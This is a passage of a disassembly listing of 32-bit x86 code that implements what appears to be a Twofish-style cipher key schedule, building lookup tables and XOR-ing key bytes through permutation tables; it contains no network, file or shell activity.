mov dl, [ebp+ecx+var_12B]
xor eax, eax
mov al, byte_418BD0[edx]
xor eax, [ebp+var_280]
xor ecx, ecx
mov cl, byte_418CD0[eax]
xor ecx, [ebp+var_27C]
mov edx, [ebp+var_238]
shl edx, 1
mov eax, [ebp+var_2AC]
mov ecx, dword_4195D4[ecx*4]
mov [eax+edx*4+929h], ecx
jmp loc_40CD25
; ---------------------------------------------------------------------------
loc_40CDD7: ; CODE XREF: sub_40C140+BFE�j
mov dl, [ebp+var_5]
push edx
mov edx, offset byte_418BD0
lea ecx, [ebp+var_12C]
call sub_40D88C
mov eax, [ebp+var_10+3]
and eax, 0FFh
mov [ebp+var_284], eax
mov ecx, [ebp+var_C+3]
and ecx, 0FFh
mov [ebp+var_288], ecx
mov [ebp+var_238], 0
jmp short loc_40CE23
; ---------------------------------------------------------------------------
loc_40CE14: ; CODE XREF: sub_40C140+D81�j
mov edx, [ebp+var_238]
add edx, 2
mov [ebp+var_238], edx
loc_40CE23: ; CODE XREF: sub_40C140+CD2�j
cmp [ebp+var_238], 100h
jge loc_40CEC6
mov eax, [ebp+var_238]
xor ecx, ecx
mov cl, [ebp+eax+var_12C]
xor edx, edx
mov dl, byte_418CD0[ecx]
xor edx, [ebp+var_288]
xor eax, eax
mov al, byte_418CD0[edx]
xor eax, [ebp+var_284]
mov ecx, [ebp+var_238]
shl ecx, 1
mov edx, [ebp+var_2AC]
mov eax, dword_4199D4[eax*4]
mov [edx+ecx*4+925h], eax
mov ecx, [ebp+var_238]
xor edx, edx
mov dl, [ebp+ecx+var_12B]
xor eax, eax
mov al, byte_418CD0[edx]
xor eax, [ebp+var_288]
xor ecx, ecx
mov cl, byte_418CD0[eax]
xor ecx, [ebp+var_284]
mov edx, [ebp+var_238]
shl edx, 1
mov eax, [ebp+var_2AC]
mov ecx, dword_4199D4[ecx*4]
mov [eax+edx*4+92Dh], ecx
jmp loc_40CE14
; ---------------------------------------------------------------------------
loc_40CEC6: ; CODE XREF: sub_40C140+CED�j
jmp loc_40D491
; ---------------------------------------------------------------------------
loc_40CECB: ; CODE XREF: sub_40C140+6BA�j
mov dl, [ebp+var_4]
push edx
mov edx, offset byte_418CD0
lea ecx, [ebp+var_22C]
call sub_40D88C
mov [ebp+var_238], 0
jmp short loc_40CEFA
; ---------------------------------------------------------------------------
loc_40CEEB: ; CODE XREF: sub_40C140+E0A�j
mov eax, [ebp+var_238]
add eax, 2
mov [ebp+var_238], eax
loc_40CEFA: ; CODE XREF: sub_40C140+DA9�j
cmp [ebp+var_238], 100h
jge short loc_40CF4C
mov ecx, [ebp+var_238]
xor edx, edx
mov dl, [ebp+ecx+var_22C]
mov eax, [ebp+var_238]
mov cl, byte_418CD0[edx]
mov [ebp+eax+var_12C], cl
mov edx, [ebp+var_238]
xor eax, eax
mov al, [ebp+edx+var_22B]
mov ecx, [ebp+var_238]
mov dl, byte_418CD0[eax]
mov [ebp+ecx+var_12B], dl
jmp short loc_40CEEB
; ---------------------------------------------------------------------------
loc_40CF4C: ; CODE XREF: sub_40C140+DC4�j
mov al, [ebp+var_8]
push eax
lea edx, [ebp+var_12C]
lea ecx, [ebp+var_12C]
call sub_40D88C
mov ecx, [ebp+var_10]
and ecx, 0FFh
mov [ebp+var_28C], ecx
mov edx, [ebp+var_C]
and edx, 0FFh
mov [ebp+var_290], edx
mov [ebp+var_238], 0
jmp short loc_40CF9A
; ---------------------------------------------------------------------------
loc_40CF8B: ; CODE XREF: sub_40C140+EF8�j
mov eax, [ebp+var_238]
add eax, 2
mov [ebp+var_238], eax
loc_40CF9A: ; CODE XREF: sub_40C140+E49�j
cmp [ebp+var_238], 100h
jge loc_40D03D
mov ecx, [ebp+var_238]
xor edx, edx
mov dl, [ebp+ecx+var_12C]
xor eax, eax
mov al, byte_418BD0[edx]
xor eax, [ebp+var_290]
xor ecx, ecx
mov cl, byte_418BD0[eax]
xor ecx, [ebp+var_28C]
mov edx, [ebp+var_238]
shl edx, 1
mov eax, [ebp+var_2AC]
mov ecx, dword_418DD4[ecx*4]
mov [eax+edx*4+121h], ecx
mov edx, [ebp+var_238]
xor eax, eax
mov al, [ebp+edx+var_12B]
xor ecx, ecx
mov cl, byte_418BD0[eax]
xor ecx, [ebp+var_290]
xor edx, edx
mov dl, byte_418BD0[ecx]
xor edx, [ebp+var_28C]
mov eax, [ebp+var_238]
shl eax, 1
mov ecx, [ebp+var_2AC]
mov edx, dword_418DD4[edx*4]
mov [ecx+eax*4+129h], edx
jmp loc_40CF8B
; ---------------------------------------------------------------------------
loc_40D03D: ; CODE XREF: sub_40C140+E64�j
mov al, [ebp+var_3]
push eax
mov edx, offset byte_418BD0
lea ecx, [ebp+var_22C]
call sub_40D88C
mov [ebp+var_238], 0 ; DATA XREF: sub_40F450+25�o
jmp short loc_40D06C
; ---------------------------------------------------------------------------
loc_40D05D: ; CODE XREF: sub_40C140+F7C�j
mov ecx, [ebp+var_238]
add ecx, 2
mov [ebp+var_238], ecx
loc_40D06C: ; CODE XREF: sub_40C140+F1B�j
cmp [ebp+var_238], 100h
jge short loc_40D0BE
mov edx, [ebp+var_238]
xor eax, eax
mov al, [ebp+edx+var_22C]
mov ecx, [ebp+var_238]
mov dl, byte_418CD0[eax]
mov [ebp+ecx+var_12C], dl
mov eax, [ebp+var_238]
xor ecx, ecx
mov cl, [ebp+eax+var_22B]
mov edx, [ebp+var_238]
mov al, byte_418CD0[ecx]
mov [ebp+edx+var_12B], al
jmp short loc_40D05D
; ---------------------------------------------------------------------------
loc_40D0BE: ; CODE XREF: sub_40C140+F36�j
mov cl, [ebp+var_7]
push ecx
lea edx, [ebp+var_12C]
lea ecx, [ebp+var_12C]
call sub_40D88C
mov edx, [ebp+var_10+1]
and edx, 0FFh
mov [ebp+var_294], edx
mov eax, [ebp+var_C+1]
and eax, 0FFh
mov [ebp+var_298], eax
mov [ebp+var_238], 0
jmp short loc_40D10B
; ---------------------------------------------------------------------------
loc_40D0FC: ; CODE XREF: sub_40C140+1069�j
mov ecx, [ebp+var_238]
add ecx, 2
mov [ebp+var_238], ecx
loc_40D10B: ; CODE XREF: sub_40C140+FBA�j
cmp [ebp+var_238], 100h
jge loc_40D1AE
mov edx, [ebp+var_238]
xor eax, eax
mov al, [ebp+edx+var_12C]
xor ecx, ecx
mov cl, byte_418CD0[eax]
xor ecx, [ebp+var_298]
xor edx, edx
mov dl, byte_418BD0[ecx]
xor edx, [ebp+var_294]
mov eax, [ebp+var_238]
shl eax, 1
mov ecx, [ebp+var_2AC]
mov edx, dword_4191D4[edx*4]
mov [ecx+eax*4+125h], edx
mov eax, [ebp+var_238]
xor ecx, ecx
mov cl, [ebp+eax+var_12B]
xor edx, edx
mov dl, byte_418CD0[ecx]
xor edx, [ebp+var_298]
xor eax, eax
mov al, byte_418BD0[edx]
xor eax, [ebp+var_294]
mov ecx, [ebp+var_238]
shl ecx, 1
mov edx, [ebp+var_2AC]
mov eax, dword_4191D4[eax*4]
mov [edx+ecx*4+12Dh], eax
jmp loc_40D0FC
; ---------------------------------------------------------------------------
loc_40D1AE: ; CODE XREF: sub_40C140+FD5�j
mov cl, [ebp+var_2]
push ecx
mov edx, offset byte_418BD0
lea ecx, [ebp+var_22C]
call sub_40D88C
mov [ebp+var_238], 0
jmp short loc_40D1DD
; ---------------------------------------------------------------------------
loc_40D1CE: ; CODE XREF: sub_40C140+10ED�j
mov edx, [ebp+var_238]
add edx, 2
mov [ebp+var_238], edx
loc_40D1DD: ; CODE XREF: sub_40C140+108C�j
cmp [ebp+var_238], 100h
jge short loc_40D22F
mov eax, [ebp+var_238]
xor ecx, ecx
mov cl, [ebp+eax+var_22C]
mov edx, [ebp+var_238]
mov al, byte_418BD0[ecx]
mov [ebp+edx+var_12C], al
loc_40D20B: ; DATA XREF: .data:0041B890�o
; .data:0041B8B0�o ...
mov ecx, [ebp+var_238]
xor edx, edx
mov dl, [ebp+ecx+var_22B]
mov eax, [ebp+var_238]
mov cl, byte_418BD0[edx]
mov [ebp+eax+var_12B], cl
jmp short loc_40D1CE
; ---------------------------------------------------------------------------
loc_40D22F: ; CODE XREF: sub_40C140+10A7�j
mov dl, [ebp+var_6]
push edx
lea edx, [ebp+var_12C]
lea ecx, [ebp+var_12C]
call sub_40D88C
mov eax, [ebp+var_10+2]
and eax, 0FFh
mov [ebp+var_29C], eax
mov ecx, [ebp+var_C+2]
and ecx, 0FFh
mov [ebp+var_2A0], ecx
mov [ebp+var_238], 0
jmp short loc_40D27C
; ---------------------------------------------------------------------------
loc_40D26D: ; CODE XREF: sub_40C140+11DA�j
mov edx, [ebp+var_238]
add edx, 2
mov [ebp+var_238], edx
loc_40D27C: ; CODE XREF: sub_40C140+112B�j
cmp [ebp+var_238], 100h
jge loc_40D31F
loc_40D28C: ; DATA XREF: .data:0041B894�o
; .data:0041B8B4�o ...
mov eax, [ebp+var_238]
xor ecx, ecx
mov cl, [ebp+eax+var_12C]
xor edx, edx
mov dl, byte_418BD0[ecx]
xor edx, [ebp+var_2A0]
xor eax, eax
mov al, byte_418CD0[edx]
xor eax, [ebp+var_29C]
mov ecx, [ebp+var_238]
shl ecx, 1
loc_40D2BF: ; DATA XREF: .data:0041B898�o
; .data:0041B8B8�o ...
mov edx, [ebp+var_2AC]
mov eax, dword_4195D4[eax*4]
mov [edx+ecx*4+921h], eax
mov ecx, [ebp+var_238]
xor edx, edx
mov dl, [ebp+ecx+var_12B]
xor eax, eax
mov al, byte_418BD0[edx]
xor eax, [ebp+var_2A0]
xor ecx, ecx
mov cl, [eax+0A06FE4h]
xor ecx, [ebp+var_29C]
mov edx, [ebp+var_238]
shl edx, 1
mov eax, [ebp+var_2AC]
mov ecx, dword_4195D4[ecx*4]
mov [eax+edx*4+929h], ecx
jmp loc_40D26D
; ---------------------------------------------------------------------------
loc_40D31F: ; CODE XREF: sub_40C140+1146�j
; DATA XREF: .data:0041B8BC�o ...
mov dl, [ebp+var_1]
push edx
mov edx, offset byte_418CD0
lea ecx, [ebp+var_22C]
call sub_40D88C
mov [ebp+var_238], 0
jmp short loc_40D34E
; ---------------------------------------------------------------------------
loc_40D33F: ; CODE XREF: sub_40C140+125E�j
mov eax, [ebp+var_238]
add eax, 2
mov [ebp+var_238], eax
loc_40D34E: ; CODE XREF: sub_40C140+11FD�j
cmp [ebp+var_238], 100h
jge short loc_40D3A0
mov ecx, [ebp+var_238]
xor edx, edx
mov dl, [ebp+ecx+var_22C]
mov eax, [ebp+var_238]
mov cl, byte_418BD0[edx]
mov [ebp+eax+var_12C], cl
mov edx, [ebp+var_238]
xor eax, eax
mov al, [ebp+edx+var_22B]
mov ecx, [ebp+var_238]
mov dl, byte_418BD0[eax]
mov [ebp+ecx+var_12B], dl
jmp short loc_40D33F
; ---------------------------------------------------------------------------
loc_40D3A0: ; CODE XREF: sub_40C140+1218�j
mov al, [ebp+var_5]
push eax
lea edx, [ebp+var_12C]
lea ecx, [ebp+var_12C]
call sub_40D88C
mov ecx, [ebp+var_10+3]
and ecx, 0FFh
mov [ebp+var_2A4], ecx
mov edx, [ebp+var_C+3]
and edx, 0FFh
mov [ebp+var_2A8], edx
mov [ebp+var_238], 0
jmp short loc_40D3EE
; ---------------------------------------------------------------------------
loc_40D3DF: ; CODE XREF: sub_40C140+134C�j
mov eax, [ebp+var_238]
add eax, 2
mov [ebp+var_238], eax
loc_40D3EE: ; CODE XREF: sub_40C140+129D�j
; DATA XREF: .data:off_41BC3C�o
cmp [ebp+var_238], 100h
jge loc_40D491
mov ecx, [ebp+var_238]
xor edx, edx
loc_40D406: ; DATA XREF: .data:off_41BC40�o
mov dl, [ebp+ecx+var_12C]
xor eax, eax
mov al, byte_418CD0[edx]
xor eax, [ebp+var_2A8]
xor ecx, ecx
mov cl, byte_418CD0[eax]
xor ecx, [ebp+var_2A4]
mov edx, [ebp+var_238]
shl edx, 1
mov eax, [ebp+var_2AC]
mov ecx, dword_4199D4[ecx*4]
mov [eax+edx*4+925h], ecx
mov edx, [ebp+var_238]
xor eax, eax
mov al, [ebp+edx+var_12B]
xor ecx, ecx
mov cl, byte_418CD0[eax]
xor ecx, [ebp+var_2A8]
xor edx, edx
mov dl, byte_418CD0[ecx]
xor edx, [ebp+var_2A4]
mov eax, [ebp+var_238]
shl eax, 1
mov ecx, [ebp+var_2AC]
mov edx, dword_4199D4[edx*4]
mov [ecx+eax*4+92Dh], edx
jmp loc_40D3DF
; ---------------------------------------------------------------------------
loc_40D491: ; CODE XREF: sub_40C140+6C0�j
; sub_40C140:loc_40CB05�j ...
mov eax, [ebp+var_2AC]
xor ecx, ecx
mov cl, [eax]
test ecx, ecx
jnz short loc_40D4AC
xor dl, dl
mov ecx, [ebp+var_2AC]
call sub_40D4B5
loc_40D4AC: ; CODE XREF: sub_40C140+135D�j
mov eax, 1
mov esp, ebp
pop ebp
retn
sub_40C140 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D4B5 proc near ; CODE XREF: sub_40C140+1367�p
var_18 = byte ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 18h
mov [ebp+var_18], dl
mov [ebp+var_14], ecx
mov eax, [ebp+var_14]
add eax, 0A1h
mov [ebp+var_10], eax
mov ecx, [ebp+var_14]
mov edx, [ecx+4Dh]
shl edx, 1
mov eax, [ebp+var_10]
lea ecx, [eax+edx*4-8]
mov [ebp+var_4], ecx
jmp short loc_40D4F2
; ---------------------------------------------------------------------------
loc_40D4E0: ; CODE XREF: sub_40D4B5+7D�j
mov edx, [ebp+var_10]
add edx, 8
mov [ebp+var_10], edx
mov eax, [ebp+var_4]
sub eax, 8
mov [ebp+var_4], eax
loc_40D4F2: ; CODE XREF: sub_40D4B5+29�j
mov ecx, [ebp+var_10]
cmp ecx, [ebp+var_4]
jnb short loc_40D534
mov edx, [ebp+var_10]
mov eax, [edx]
mov [ebp+var_8], eax
mov ecx, [ebp+var_10]
mov edx, [ecx+4]
mov [ebp+var_C], edx
mov eax, [ebp+var_10]
mov ecx, [ebp+var_4]
mov edx, [ecx]
mov [eax], edx
mov eax, [ebp+var_10]
mov ecx, [ebp+var_4]
mov edx, [ecx+4]
mov [eax+4], edx
mov eax, [ebp+var_4]
mov ecx, [ebp+var_8]
mov [eax], ecx
mov edx, [ebp+var_4]
mov eax, [ebp+var_C]
mov [edx+4], eax
jmp short loc_40D4E0
; ---------------------------------------------------------------------------
loc_40D534: ; CODE XREF: sub_40D4B5+43�j
mov ecx, [ebp+var_14]
mov dl, [ebp+var_18]
mov [ecx], dl
mov esp, ebp
pop ebp
retn
sub_40D4B5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D540 proc near ; CODE XREF: sub_40C140+26�p
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = byte ptr -8
var_7 = byte ptr -7
var_4 = byte ptr -4
var_3 = byte ptr -3
push ebp
mov ebp, esp
sub esp, 14h
mov [ebp+var_10], 0
jmp short loc_40D558
; ---------------------------------------------------------------------------
loc_40D54F: ; CODE XREF: sub_40D540+232�j
mov eax, [ebp+var_10]
add eax, 1
mov [ebp+var_10], eax
loc_40D558: ; CODE XREF: sub_40D540+D�j
cmp [ebp+var_10], 100h
jge loc_40D777
mov ecx, [ebp+var_10]
mov dl, byte_418BD0[ecx]
mov byte ptr [ebp+var_14], dl
mov eax, [ebp+var_14]
and eax, 0FFh
mov ecx, [ebp+var_14]
and ecx, 0FFh
sar ecx, 2
mov edx, [ebp+var_14]
and edx, 0FFh
loc_40D58E: ; DATA XREF: .data:0041BD0C�o
and edx, 2
neg edx
sbb edx, edx
and edx, 0B4h
xor ecx, edx
mov edx, [ebp+var_14]
and edx, 0FFh
and edx, 1
neg edx
sbb edx, edx
and edx, 5Ah
xor ecx, edx
xor eax, ecx
mov [ebp+var_4], al
mov eax, [ebp+var_14]
and eax, 0FFh
mov ecx, [ebp+var_14]
and ecx, 0FFh
sar ecx, 1
mov edx, [ebp+var_14]
and edx, 0FFh
and edx, 1
neg edx
sbb edx, edx
and edx, 0B4h
xor ecx, edx
xor eax, ecx
mov ecx, [ebp+var_14]
and ecx, 0FFh
sar ecx, 2
mov edx, [ebp+var_14]
and edx, 0FFh
and edx, 2
neg edx
sbb edx, edx
and edx, 0B4h
xor ecx, edx
mov edx, [ebp+var_14]
and edx, 0FFh
and edx, 1
neg edx
sbb edx, edx
and edx, 5Ah
xor ecx, edx
xor eax, ecx
mov [ebp+var_8], al
mov eax, [ebp+var_10]
mov cl, byte_418CD0[eax]
mov byte ptr [ebp+var_14+1], cl
mov edx, [ebp+var_14+1]
and edx, 0FFh
mov eax, [ebp+var_14+1]
and eax, 0FFh
sar eax, 2
mov ecx, [ebp+var_14+1]
and ecx, 0FFh
and ecx, 2
neg ecx
sbb ecx, ecx
and ecx, 0B4h
xor eax, ecx
mov ecx, [ebp+var_14+1]
and ecx, 0FFh
and ecx, 1
neg ecx
sbb ecx, ecx
and ecx, 5Ah
xor eax, ecx
xor edx, eax
mov [ebp+var_3], dl
mov edx, [ebp+var_14+1]
and edx, 0FFh
mov eax, [ebp+var_14+1]
loc_40D680: ; DATA XREF: .data:0041BD60�o
and eax, 0FFh
sar eax, 1
mov ecx, [ebp+var_14+1]
loc_40D68A: ; DATA XREF: .data:0041BD64�o
and ecx, 0FFh
and ecx, 1
neg ecx
loc_40D695: ; DATA XREF: .data:0041BD68�o
sbb ecx, ecx
and ecx, 0B4h
xor eax, ecx
xor edx, eax
loc_40D6A1: ; DATA XREF: .data:0041BD6C�o
mov eax, [ebp+var_14+1]
and eax, 0FFh
sar eax, 2
loc_40D6AC: ; DATA XREF: .data:0041BD70�o
mov ecx, [ebp+var_14+1]
and ecx, 0FFh
and ecx, 2
neg ecx
sbb ecx, ecx
loc_40D6BC: ; DATA XREF: .data:0041BDA0�o
and ecx, 0B4h
xor eax, ecx
mov ecx, [ebp+var_14+1]
and ecx, 0FFh
and ecx, 1
neg ecx
sbb ecx, ecx
and ecx, 5Ah
xor eax, ecx
xor edx, eax
mov [ebp+var_7], dl
mov dl, byte ptr [ebp+var_14+1]
loc_40D6E1: ; DATA XREF: .data:0041BD9C�o
mov byte ptr [ebp+var_C], dl
mov al, [ebp+var_3]
mov byte ptr [ebp+var_C+1], al
mov cl, [ebp+var_7]
mov byte ptr [ebp+var_C+2], cl
loc_40D6F0: ; DATA XREF: .data:0041BDCC�o
mov dl, [ebp+var_7]
mov byte ptr [ebp+var_C+3], dl
mov eax, [ebp+var_10]
mov ecx, [ebp+var_C]
mov dword_418DD4[eax*4], ecx
mov dl, [ebp+var_8]
mov byte ptr [ebp+var_C], dl
mov al, [ebp+var_8]
mov byte ptr [ebp+var_C+1], al
mov cl, [ebp+var_4]
mov byte ptr [ebp+var_C+2], cl
mov dl, byte ptr [ebp+var_14]
mov byte ptr [ebp+var_C+3], dl
mov eax, [ebp+var_10]
loc_40D71E: ; DATA XREF: .data:0041BDFC�o
mov ecx, [ebp+var_C]
mov dword_4191D4[eax*4], ecx
mov dl, [ebp+var_3]
mov byte ptr [ebp+var_C], dl
mov al, [ebp+var_7]
mov byte ptr [ebp+var_C+1], al
mov cl, byte ptr [ebp+var_14+1]
mov byte ptr [ebp+var_C+2], cl
mov dl, [ebp+var_7]
mov byte ptr [ebp+var_C+3], dl
mov eax, [ebp+var_10]
mov ecx, [ebp+var_C]
mov dword_4195D4[eax*4], ecx
mov dl, [ebp+var_4]
mov byte ptr [ebp+var_C], dl
mov al, byte ptr [ebp+var_14]
mov byte ptr [ebp+var_C+1], al
mov cl, [ebp+var_8]
mov byte ptr [ebp+var_C+2], cl
mov dl, [ebp+var_4]
mov byte ptr [ebp+var_C+3], dl
mov eax, [ebp+var_10]
mov ecx, [ebp+var_C]
mov dword_4199D4[eax*4], ecx
jmp loc_40D54F
; ---------------------------------------------------------------------------
loc_40D777: ; CODE XREF: sub_40D540+1F�j
; DATA XREF: .data:0041BE3C�o
mov dword_418DD0, 0
mov esp, ebp
pop ebp
retn
sub_40D540 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D785 proc near ; CODE XREF: sub_40C140+102�p
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 24h
mov [ebp+var_20], edx
mov [ebp+var_1C], ecx
mov [ebp+var_4], 0
mov eax, [ebp+var_4]
mov [ebp+var_8], eax
jmp short loc_40D7A9
; ---------------------------------------------------------------------------
loc_40D7A0: ; CODE XREF: sub_40D785:loc_40D880�j
mov ecx, [ebp+var_8]
add ecx, 1
mov [ebp+var_8], ecx
loc_40D7A9: ; CODE XREF: sub_40D785+19�j
; DATA XREF: .data:0041BE40�o
cmp [ebp+var_8], 2
jge loc_40D885
cmp [ebp+var_8], 0
jz short loc_40D7C1
mov edx, [ebp+var_1C]
loc_40D7BC: ; DATA XREF: .data:0041BE44�o
mov [ebp+var_24], edx
jmp short loc_40D7C7
; ---------------------------------------------------------------------------
loc_40D7C1: ; CODE XREF: sub_40D785+32�j
mov eax, [ebp+var_20]
mov [ebp+var_24], eax
loc_40D7C7: ; CODE XREF: sub_40D785+3A�j
mov ecx, [ebp+var_4]
xor ecx, [ebp+var_24]
mov [ebp+var_4], ecx
mov [ebp+var_C], 0
jmp short loc_40D7E2
; ---------------------------------------------------------------------------
loc_40D7D9: ; CODE XREF: sub_40D785+F6�j
mov edx, [ebp+var_C]
add edx, 1
mov [ebp+var_C], edx
loc_40D7E2: ; CODE XREF: sub_40D785+52�j
cmp [ebp+var_C], 4
jge loc_40D880
mov eax, [ebp+var_4]
shr eax, 18h
mov byte ptr [ebp+var_10], al
mov ecx, [ebp+var_10]
and ecx, 0FFh
shl ecx, 1
mov edx, [ebp+var_10]
and edx, 0FFh
and edx, 80h
neg edx
sbb edx, edx
and edx, 14Dh
xor ecx, edx
and ecx, 0FFh
mov [ebp+var_14], ecx
mov eax, [ebp+var_10]
and eax, 0FFh
sar eax, 1
and eax, 7Fh
mov ecx, [ebp+var_10]
and ecx, 0FFh
and ecx, 1
neg ecx
sbb ecx, ecx
and ecx, 0A6h
xor eax, ecx
xor eax, [ebp+var_14]
mov [ebp+var_18], eax
mov edx, [ebp+var_4]
shl edx, 8
mov eax, [ebp+var_18]
shl eax, 18h
xor edx, eax
mov ecx, [ebp+var_14]
shl ecx, 10h
xor edx, ecx
mov eax, [ebp+var_18]
loc_40D868: ; DATA XREF: sub_410CF0+A8�o
shl eax, 8
xor edx, eax
mov ecx, [ebp+var_10]
and ecx, 0FFh
xor edx, ecx
mov [ebp+var_4], edx
jmp loc_40D7D9
; ---------------------------------------------------------------------------
loc_40D880: ; CODE XREF: sub_40D785+61�j
; DATA XREF: rdata:0040FA4F�o ...
jmp loc_40D7A0
; ---------------------------------------------------------------------------
loc_40D885: ; CODE XREF: sub_40D785+28�j
mov eax, [ebp+var_4]
mov esp, ebp
pop ebp
retn
sub_40D785 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D88C proc near ; CODE XREF: sub_40C140+6D4�p
; sub_40C140+794�p ...
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 14h
mov [ebp+var_14], edx
mov [ebp+var_10], ecx
mov eax, [ebp+arg_0]
and eax, 0FFh
imul eax, 1010101h
mov [ebp+var_C], eax
mov ecx, [ebp+var_10]
mov [ebp+var_8], ecx
mov edx, [ebp+var_14]
mov [ebp+var_4], edx
mov eax, [ebp+var_4]
mov ecx, [eax]
xor ecx, [ebp+var_C]
mov edx, [ebp+var_8]
mov [edx], ecx
mov eax, [ebp+var_4]
mov ecx, [eax+4]
xor ecx, [ebp+var_C]
mov edx, [ebp+var_8]
mov [edx+4], ecx
mov eax, [ebp+var_4]
mov ecx, [eax+8]
xor ecx, [ebp+var_C]
mov edx, [ebp+var_8]
mov [edx+8], ecx
mov eax, [ebp+var_4]
mov ecx, [eax+0Ch]
xor ecx, [ebp+var_C]
mov edx, [ebp+var_8]
mov [edx+0Ch], ecx
mov eax, [ebp+var_4]
mov ecx, [eax+10h]
xor ecx, [ebp+var_C]
mov edx, [ebp+var_8]
mov [edx+10h], ecx
mov eax, [ebp+var_4]
mov ecx, [eax+14h]
xor ecx, [ebp+var_C]
mov edx, [ebp+var_8]
mov [edx+14h], ecx
mov eax, [ebp+var_4]
mov ecx, [eax+18h]
xor ecx, [ebp+var_C]
mov edx, [ebp+var_8]
mov [edx+18h], ecx
mov eax, [ebp+var_4]
mov ecx, [eax+1Ch]
xor ecx, [ebp+var_C]
mov edx, [ebp+var_8]
mov [edx+1Ch], ecx
mov eax, [ebp+var_4]
mov ecx, [eax+20h]
xor ecx, [ebp+var_C]
mov edx, [ebp+var_8]
mov [edx+20h], ecx
mov eax, [ebp+var_4]
mov ecx, [eax+24h]
xor ecx, [ebp+var_C]
mov edx, [ebp+var_8]
mov [edx+24h], ecx
mov eax, [ebp+var_4]
mov ecx, [eax+28h]
xor ecx, [ebp+var_C]
mov edx, [ebp+var_8]
mov [edx+28h], ecx
mov eax, [ebp+var_4]
mov ecx, [eax+2Ch]
xor ecx, [ebp+var_C]
mov edx, [ebp+var_8]
mov [edx+2Ch], ecx
mov eax, [ebp+var_4]
mov ecx, [eax+30h]
xor ecx, [ebp+var_C]
mov edx, [ebp+var_8]
mov [edx+30h], ecx
mov eax, [ebp+var_4]
mov ecx, [eax+34h]
xor ecx, [ebp+var_C]
mov edx, [ebp+var_8]
mov [edx+34h], ecx
mov eax, [ebp+var_4]
mov ecx, [eax+38h]
xor ecx, [ebp+var_C]
mov edx, [ebp+var_8]
mov [edx+38h], ecx
mov eax, [ebp+var_4]
mov ecx, [eax+3Ch]
xor ecx, [ebp+var_C]
mov edx, [ebp+var_8]
mov [edx+3Ch], ecx
mov eax, [ebp+var_4]
mov ecx, [eax+40h]
xor ecx, [ebp+var_C]
mov edx, [ebp+var_8]
mov [edx+40h], ecx
mov eax, [ebp+var_4]
mov ecx, [eax+44h]
xor ecx, [ebp+var_C]
mov edx, [ebp+var_8]
mov [edx+44h], ecx
mov eax, [ebp+var_4]
mov ecx, [eax+48h]
xor ecx, [ebp+var_C]
mov edx, [ebp+var_8]
mov [edx+48h], ecx
mov eax, [ebp+var_4]
mov ecx, [eax+4Ch]
xor ecx, [ebp+var_C]
mov edx, [ebp+var_8]
mov [edx+4Ch], ecx
mov eax, [ebp+var_4]
mov ecx, [eax+50h]
xor ecx, [ebp+var_C]
mov edx, [ebp+var_8]
mov [edx+50h], ecx
mov eax, [ebp+var_4]
mov ecx, [eax+54h]
xor ecx, [ebp+var_C]
mov edx, [ebp+var_8]
mov [edx+54h], ecx
mov eax, [ebp+var_4]
mov ecx, [eax+58h]
xor ecx, [ebp+var_C]
mov edx, [ebp+var_8]
mov [edx+58h], ecx
mov eax, [ebp+var_4]
mov ecx, [eax+5Ch]
xor ecx, [ebp+var_C]
mov edx, [ebp+var_8]
mov [edx+5Ch], ecx
mov eax, [ebp+var_4]
mov ecx, [eax+60h]
xor ecx, [ebp+var_C]
mov edx, [ebp+var_8]
mov [edx+60h], ecx
mov eax, [ebp+var_4]
mov ecx, [eax+64h]
xor ecx, [ebp+var_C]
mov edx, [ebp+var_8]
mov [edx+64h], ecx
mov eax, [ebp+var_4]
mov ecx, [eax+68h]
xor ecx, [ebp+var_C]
mov edx, [ebp+var_8]
mov [edx+68h], ecx
mov eax, [ebp+var_4]
mov ecx, [eax+6Ch]
xor ecx, [ebp+var_C]
mov edx, [ebp+var_8]
mov [edx+6Ch], ecx
mov eax, [ebp+var_4]
mov ecx, [eax+70h]
xor ecx, [ebp+var_C]
mov edx, [ebp+var_8]
mov [edx+70h], ecx
mov eax, [ebp+var_4]
mov ecx, [eax+74h]
xor ecx, [ebp+var_C]
mov edx, [ebp+var_8]
mov [edx+74h], ecx
mov eax, [ebp+var_4]
mov ecx, [eax+78h]
xor ecx, [ebp+var_C]
mov edx, [ebp+var_8]
mov [edx+78h], ecx
mov eax, [ebp+var_4]
mov ecx, [eax+7Ch]
xor ecx, [ebp+var_C]
mov edx, [ebp+var_8]
mov [edx+7Ch], ecx
mov eax, [ebp+var_8]
add eax, 80h
mov [ebp+var_8], eax
mov ecx, [ebp+var_4]
add ecx, 80h
mov [ebp+var_4], ecx
mov edx, [ebp+var_4]
mov eax, [edx]
xor eax, [ebp+var_C]
mov ecx, [ebp+var_8]
mov [ecx], eax
mov edx, [ebp+var_4]
mov eax, [edx+4]
xor eax, [ebp+var_C]
mov ecx, [ebp+var_8]
mov [ecx+4], eax
mov edx, [ebp+var_4]
mov eax, [edx+8]
xor eax, [ebp+var_C]
mov ecx, [ebp+var_8]
mov [ecx+8], eax
mov edx, [ebp+var_4]
mov eax, [edx+0Ch]
xor eax, [ebp+var_C]
mov ecx, [ebp+var_8]
mov [ecx+0Ch], eax
mov edx, [ebp+var_4]
mov eax, [edx+10h]
xor eax, [ebp+var_C]
mov ecx, [ebp+var_8]
mov [ecx+10h], eax
mov edx, [ebp+var_4]
mov eax, [edx+14h]
xor eax, [ebp+var_C]
mov ecx, [ebp+var_8]
mov [ecx+14h], eax
mov edx, [ebp+var_4]
mov eax, [edx+18h]
xor eax, [ebp+var_C]
mov ecx, [ebp+var_8]
mov [ecx+18h], eax
